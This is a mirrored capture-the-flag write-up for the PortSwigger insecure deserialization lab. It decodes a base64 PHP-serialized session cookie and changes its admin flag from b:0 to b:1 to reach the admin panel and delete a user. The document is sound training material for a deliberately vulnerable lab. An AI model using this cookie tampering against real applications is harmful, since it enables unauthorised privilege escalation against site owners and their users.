mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-25 13:20:18 +00:00
1.4 KiB
1.4 KiB
Portswigger Insecure Deserialization - Lab 1
Modifying serialized objects
In this lab we need to modify the session cookie which is using serlialization through which we need to escalate our privileges to administrator user and then delete the carlos user
We can login with the credentials wiener:peter
After logging in we'll see the session token
Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czo1OiJhZG1pbiI7YjowO30%3d
Which is base64 encoded, we can decode this, I used cyberchef
Now to understand the serlized cookie
O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:0;}
O:4
represents thatUser
is a object of length 4, which has 2 attributes which are username and adminusername
is a string of length8
, which has the valuewiener
of length6
admin
is a string with length5
which has a boolean value which is represented byb
having the value0
which is false
So we need to make this value true with b:1
After refreshing the page we'll see that we have access to admin panel
And we can delete carlos user and complete the lab